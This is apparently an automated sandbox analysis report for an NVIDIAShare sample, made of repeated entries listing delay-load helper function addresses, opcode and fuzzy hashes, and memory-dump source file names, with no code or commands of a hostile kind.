Opcode ID: db5e44095cfca8316b694d9f7613a421d4d3a6b894ce555e59f04ce81bae2a97
Instruction ID: 214b5ccabe5881e2da6612996def4f65c0839d7cac0abd53eec8cb7e0c79d2a9
Opcode Fuzzy Hash: db5e44095cfca8316b694d9f7613a421d4d3a6b894ce555e59f04ce81bae2a97
Instruction Fuzzy Hash: 58B012C125C0017C31051225DD05E3F110CE6C1D10320502FFCD8D8485F8441C090471

Function 0101E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 381b0f3a11d8afaeacda62cd2c9cb61de7e628cc1008b2523ab25a5e9c2f912c
Instruction ID: f3d5b0f25a2af2807c6a16aad00d8d7c9e2131e2e8a46134415b513eb1768e7a
Opcode Fuzzy Hash: 381b0f3a11d8afaeacda62cd2c9cb61de7e628cc1008b2523ab25a5e9c2f912c
Instruction Fuzzy Hash: 9CB012C12580417C31055209DE01D3F150CD6C5E10320801FFCCCC8044F8441C060571

Function 0101E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0552bb0130be7ea5cd940134cfc2f664819936d285463b188669d23895cb4607
Instruction ID: ec1b446e2256414fec000520a2bc2b00fc8a89acfc9aba3322920b64dc83996c
Opcode Fuzzy Hash: 0552bb0130be7ea5cd940134cfc2f664819936d285463b188669d23895cb4607
Instruction Fuzzy Hash: 8CB012C125D0017D31055209DD01E3F110CE6C5D10320401FFCCCC8044F8441C050571

Function 0101E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 82533edf324cfe08fe29e97db02929a870f99e8d4127d862012a8e034de04721
Instruction ID: 48dddb407f410e23c0741f0acb087f6f38e95b1055f7b4fea63319daf44a5af7
Opcode Fuzzy Hash: 82533edf324cfe08fe29e97db02929a870f99e8d4127d862012a8e034de04721
Instruction Fuzzy Hash: 56B012C12581017C32055209DD02D3F111CD6C5D10320421FFCCCC8044F8442C490571

Function 0101E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E580

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 37958d85ed9fe38fc37bbb065ee2d692b225db84249e03ba4acd200564622c6b
Instruction ID: 8fb44fcf3c63c1f910765bc11d4ac108cd0da4938601c6152be65d91e6fe641a
Opcode Fuzzy Hash: 37958d85ed9fe38fc37bbb065ee2d692b225db84249e03ba4acd200564622c6b
Instruction Fuzzy Hash: CBB012C1659101BD31055155DD01C3F215CE6C4910320401FFCCCCD044F8441C010471

Function 0101E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E580

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 47f443136a76a2fbc7649aa477e004317d25a9560b6dd0608c4e8a7f0826e34b
Instruction ID: c659e16a7fc367c9e1ab855b6dad5d3b15abe5ceffcb597f7a085e14886f150e
Opcode Fuzzy Hash: 47f443136a76a2fbc7649aa477e004317d25a9560b6dd0608c4e8a7f0826e34b
Instruction Fuzzy Hash: 3AB012C1658101BC31055155DE01C3F617CD6C4910360421FFCCCCD044FC441C020471

Function 0101E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E580

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 00158a2d95572b6dc4d833d746a05f4ea304060907a2976893a73651031a516d
Instruction ID: 651b7f3e287c08ec764456ea97d10fb58c746e8eb7b4601acd59e52f29ff0e58
Opcode Fuzzy Hash: 00158a2d95572b6dc4d833d746a05f4ea304060907a2976893a73651031a516d
Instruction Fuzzy Hash: F3B012C1658201BD31455155DD02C3F217CD6C4910320421FFCCCCD044F8441C410471

Function 0101E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d2fdd046b25d0b4e345de736f29691f8323015c77e7d611ef9f2a746823cbdcf
Instruction ID: 85aace7adcc5d1cebee061f8371faa6f66f5062e2ab578477d2d35a386104e12
Opcode Fuzzy Hash: d2fdd046b25d0b4e345de736f29691f8323015c77e7d611ef9f2a746823cbdcf
Instruction Fuzzy Hash: 8CB012E125C0117C30055105DF05C7F020CD6C4920320C01FFDCCD8044D8441C0E0873

Function 0101E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e25f19bae1487f1f5352d15acb960f9bc2db343457490e94d94937918796a5f4
Instruction ID: cd9593717e7ebf2ed828371590bfbdec4d96b695d378a8e419a60867f8becb98
Opcode Fuzzy Hash: e25f19bae1487f1f5352d15acb960f9bc2db343457490e94d94937918796a5f4
Instruction Fuzzy Hash: 80B012F165C011FC30059105DD05C3F024CD6C4E10320C01FFCCCD8044D8485D090473

Function 0101E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cfd9ef1385eed80298058fc83dd0cd72251969832cd92666d8e1b37c4175de2b
Instruction ID: 350f8d76f511b809350aa210e6c52221da445448b0e8651335ffd5f874c07634
Opcode Fuzzy Hash: cfd9ef1385eed80298058fc83dd0cd72251969832cd92666d8e1b37c4175de2b
Instruction Fuzzy Hash: 5BB012E165C011BC30059105DE05C3F020CD6C4920320C01FFCCCD8044D8445C090873

Function 0101E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 87e732825f2394e1ed79d66e9fc1b51656e10546ee8bfd1afa14549787987ae7
Instruction ID: 6c37eeca4ba4309e90b94170aad58ba3533d9d5d0c9c81a65c5370fd31139fd4
Opcode Fuzzy Hash: 87e732825f2394e1ed79d66e9fc1b51656e10546ee8bfd1afa14549787987ae7
Instruction Fuzzy Hash: 71A001E66A91627D710A6652AE0AC7F121DCAD5A25320952EFCA9E8488AC8828461873

Function 0101E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e892327258928e5e2adf73823c05c4b1db1ce94f789cbca47699410d95870433
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: e892327258928e5e2adf73823c05c4b1db1ce94f789cbca47699410d95870433
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 51be4cfe6e200d441e2578d64901c947a372e21c6dd3c4612882c5a1e0a7b637
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 51be4cfe6e200d441e2578d64901c947a372e21c6dd3c4612882c5a1e0a7b637
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 83caaa049db07c3f01617ef2dacdd8d2c7746ee5735d2cf6fb280cc8b18ae367
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 83caaa049db07c3f01617ef2dacdd8d2c7746ee5735d2cf6fb280cc8b18ae367
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0a2e4bf9a724199ef004c39e9be412b0bd46616a09eb17419bf2f12cdc86c1fa
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 0a2e4bf9a724199ef004c39e9be412b0bd46616a09eb17419bf2f12cdc86c1fa
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0ac36788fb6949bae5b7582efb04957f4dd97b44810dfb4be52e2cd2da2c207b
Instruction ID: 2b010d253ef607cdfb49240357489ea10381a9e09ba9c35e7764d1b216a82526
Opcode Fuzzy Hash: 0ac36788fb6949bae5b7582efb04957f4dd97b44810dfb4be52e2cd2da2c207b
Instruction Fuzzy Hash: 99A002E5159142BC710555529D05CBF111DD5D5951320452EEC97D4484584459450471

Function 0101E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 44fb098375c0c5ba334f77bbd8a0a03b44304a7d0c22e9a2c20088e55b20671b
